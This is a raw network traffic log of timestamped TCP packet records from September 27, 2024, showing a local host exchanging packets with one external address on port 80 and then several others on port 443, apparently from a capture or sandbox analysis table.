Sep 27, 2024 00:15:16.480710030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480725050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480740070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480750084 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480796099 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480832100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480848074 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480856895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480871916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480886936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480889082 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480901957 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480926991 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480930090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480946064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480962038 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480974913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480981112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480981112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.481000900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481014967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481017113 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.481031895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481071949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.481074095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481090069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481103897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481115103 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.481121063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481136084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.481139898 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.481189966 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.536664009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536683083 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536699057 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536714077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536730051 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536736012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.536789894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536789894 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.536808968 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536822081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.536848068 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.536871910 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.537147045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537161112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537183046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537199974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537214994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537220001 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.537230968 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537245035 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.537245989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537266016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.537290096 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.537298918 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.538362026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538382053 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538398027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538414001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538424015 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.538430929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538450003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538458109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.538475990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538492918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.538502932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.538525105 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539028883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539062023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539077044 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539114952 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539129019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539144993 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539159060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539169073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539175987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539206982 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539304972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539329052 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539345026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539345980 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539361954 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539377928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539398909 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539421082 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539427042 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539694071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539709091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539724112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539738894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539746046 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539753914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539772034 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539777994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539803028 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539817095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539829016 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539834023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539849997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539863110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539869070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539876938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539892912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539908886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539921045 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.539942026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.539942980 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566040993 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566061974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566073895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566086054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566098928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566098928 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566140890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566154003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566160917 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566210032 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566226006 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566240072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566251040 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566263914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566276073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566276073 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566289902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566292048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.566303015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.566319942 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567158937 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567178011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567188025 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567214012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567255974 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567297935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567308903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567321062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567334890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567362070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567375898 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567513943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567526102 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567538023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567567110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567643881 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567666054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567683935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567694902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567698002 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567708015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567718983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567730904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567739010 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567758083 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567765951 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567770004 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567784071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567809105 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567826986 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567863941 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.567877054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.567890882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568053007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568063974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568079948 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568090916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568092108 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.568104029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.568116903 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.568131924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.608849049 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.669409990 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:16.669471979 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.671816111 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.671822071 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:16.672084093 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:16.673660040 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.673746109 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.673774004 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:17.747716904 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:17.747889996 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:17.748096943 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:17.751903057 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:17.751938105 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:17.751955986 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:17.751960993 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:17.793066978 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:17.793100119 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:17.793292046 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:17.794768095 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:17.794790983 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.261109114 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.261259079 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.356431961 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.356467962 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.356924057 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.358131886 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.358153105 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.358267069 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.792736053 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.792881012 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.793185949 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.910876036 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.910893917 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.910934925 CEST	49716	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:18.910939932 CEST	443	49716	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:18.955137014 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:18.955180883 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:18.955251932 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:18.955686092 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:18.955699921 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.455905914 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.455986023 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.459297895 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.459316015 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.459762096 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.471323013 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.471648932 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.471690893 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.906200886 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.906332970 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.906750917 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.907238960 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.907250881 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.907310963 CEST	49719	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:19.907315969 CEST	443	49719	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:19.931576014 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:19.931619883 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:19.932161093 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:19.932619095 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:19.932638884 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.444088936 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.444638968 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.449584961 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.449599028 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.449872971 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.459762096 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.459810972 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.459861994 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.895452976 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.895553112 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.895607948 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.896776915 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.896796942 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.896827936 CEST	49721	443	192.168.2.5	104.21.58.182
Sep 27, 2024 00:15:20.896836042 CEST	443	49721	104.21.58.182	192.168.2.5
Sep 27, 2024 00:15:20.915170908 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:20.915206909 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:20.915277958 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:20.915815115 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:20.915824890 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.453325987 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.453448057 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.510116100 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.510129929 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.510498047 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.511724949 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.511740923 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.511795998 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.953659058 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.953773022 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.953824997 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.954265118 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.954265118 CEST	49722	443	192.168.2.5	188.114.97.3
Sep 27, 2024 00:15:21.954284906 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.954294920 CEST	443	49722	188.114.97.3	192.168.2.5
Sep 27, 2024 00:15:21.973926067 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:21.973958969 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:21.974030018 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:21.974411011 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:21.974421024 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.464819908 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.464884043 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.511346102 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.511379957 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.511910915 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.513627052 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.513710022 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.513751030 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.924022913 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.924305916 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.927277088 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.948519945 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.948549032 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.948561907 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:22.948569059 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:22.973813057 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:22.973844051 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:22.973992109 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:22.974941969 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:22.974956989 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.483604908 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.483992100 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.492260933 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.492271900 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.492655993 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.493886948 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.493886948 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.493989944 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.899857998 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.899965048 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.900170088 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.915858030 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.915858984 CEST	49725	443	192.168.2.5	172.67.208.139
Sep 27, 2024 00:15:23.915874958 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:23.915883064 CEST	443	49725	172.67.208.139	192.168.2.5
Sep 27, 2024 00:15:24.066332102 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.066369057 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:24.066478968 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.068687916 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.068702936 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:24.717888117 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:24.718116999 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.724073887 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.724091053 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:24.724507093 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:24.726156950 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:24.771394968 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.188988924 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.189013958 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.189052105 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.189063072 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.189219952 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.189219952 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.290153980 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.290173054 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.290231943 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.290244102 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.290468931 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.290468931 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.295696020 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.295763969 CEST	443	49726	104.102.49.254	192.168.2.5
Sep 27, 2024 00:15:25.295764923 CEST	49726	443	192.168.2.5	104.102.49.254
Sep 27, 2024 00:15:25.295886993 CEST	49726	443	192.168.2.5	104.102.49.254
